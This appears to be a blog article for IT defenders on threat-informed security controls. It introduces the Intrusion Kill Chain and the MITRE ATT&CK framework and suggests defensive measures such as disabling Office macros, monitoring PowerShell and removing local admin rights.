Threat-informed controls
In our last two articles, we talked about why you need a security map and how the first strategic step on your journey are passive preventative controls, which are configuration decisions and best practices that everybody should follow regardless of the threat landscape.
The next strategy is involves awareness and action: deploying preventative controls based on known adversary behavior. This is where threat-informed controls come in. We have to stop guessing what adversaries might do and start looking at what they really do.
What is a Threat-informed control?
A threat-informed control is a security decision or safeguard you choose because you have proof that adversaries use a specific method.
Think of home security. You’ve put locks on your doors and windows (passive preventative controls). You could spend money on a high-tech roof alarm to stop people from dropping in through the chimney. But if local crime reports indicate burglars are breaking in via a common garage door opener that has easy to clone the signal for, the roof alarm is a waste of money. A threat-informed choice would be to update or replace your garage door opener, or at a minimum make it your security practice to lock the door from the house to the garage every night.
Two threat-informed resources to know: Intrusion Kill Chain and MITRE ATT&CK
To effectively assess and implement threat-informed controls, you need to understand the Intrusion Kill Chain model and an invaluable public resource, the MITRE ATT&CK framework.
Intrusion Kill Chain
Created by Lockheed Martin, this model shows that a cyberattack is not a single event. It is a series of seven steps. If you break even one link in this chain, the whole attack fails (like the “hedgehog defence”).
The steps are:
Reconnaissance: The adversary researches your organization.
Weaponization: They create a "trap," like a malicious file.
Delivery: They send the trap to you (often via email).
Exploitation: The trap is triggered when someone clicks it.
Installation: The adversary’s software installs itself on your system.
Command and Control: The software "calls home" to the adversary for instructions.
Actions on Objectives: The adversary steals data or encrypts your files.
Why it matters: You don't have to be perfect at every step. You just have to stop the adversary at one of these stages to prevent victory and give you time to respond.
The MITRE ATT&CK Framework
If the Kill Chain is the "big picture," MITRE ATT&CK is the "adversary playbook." It is a giant database that lists every specific move adversaries have ever used.
MITRE is a not-for-profit organization that manages several federally funded research and development centers for the US government. The ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework was started in 2013 out of a MITRE project.
Tactics: The "Why." These are the attacker’s technical goals (e.g., Initial Access, Persistence, Exfiltration).
Techniques: The "How." These are the specific methods used to achieve a tactic (e.g., Phishing, Brute Force, OS Credential Dumping).
Why ATT&CK changes the game
Before ATT&CK, security was often reactive. ATT&CK provides a periodic table of hacker movements, allowing organizations to:
Map defenses: See exactly which "squares" on the matrix they are protected against.
Threat hunt: Look for specific patterns of behavior rather than just waiting for an antivirus alert.
Communicate: It gave the industry a common language so that "Red Teams" (attackers) and "Blue Teams" (defenders) could speak the same dialect.
How this helps you as the resource strapped defender
As an IT professional, your time and people power is limited. You probably can’t patch every vulnerability, and not every preventative control may be worth your effort in terms of risk reduction. Threat-informed defense helps you prioritize. You can say, "We have 50 vulnerabilities to fix, but these three are being used by adversaries right now to steal passwords. Let’s fix those first."
You may also find some controls can help mitigate the risk of multiple techniques across the tactical phases, making them more valuable to prioritize.
Examples of Threat-Informed Controls
Here are a few ways you can apply this today:
Block Microsoft Office macros: Adversaries love to use macros to deliver malware. Disabling them for most users is a threat-informed control because it breaks the "Delivery" link in the Kill Chain.
Monitor PowerShell usage: Adversaries often use PowerShell (a tool you already have, referred to as “living off the land”) to move around your network. By setting up an alert for unusual PowerShell commands, you are using threat-informed knowledge to catch them.
Limit admin rights: Most adversaries need "Admin" or "System" rights to finish their work. By removing local admin rights from your users, you make it much harder for an adversary to move from Step 4 (Exploitation) to Step 5 (Installation).
The great thing is that a lot of controls do NOT require additional, expensive tooling, but is likely something you can implement with existing administrative capabilities.
Maximize effort and impact with threat-informed controls
Threat-informed defense is about being smart with your resources. When you understand the Intrusion Kill Chain and use tools like MITRE ATT&CK, you move from being reactive to being proactive. And, like the “hedgehog defence”, you will slow and break the adversary attack progression.
Resources
Intrusion Kill Chain: https://en.wikipedia.org/wiki/Cyber_kill_chain
MITRE ATT&CK: https://attack.mitre.org/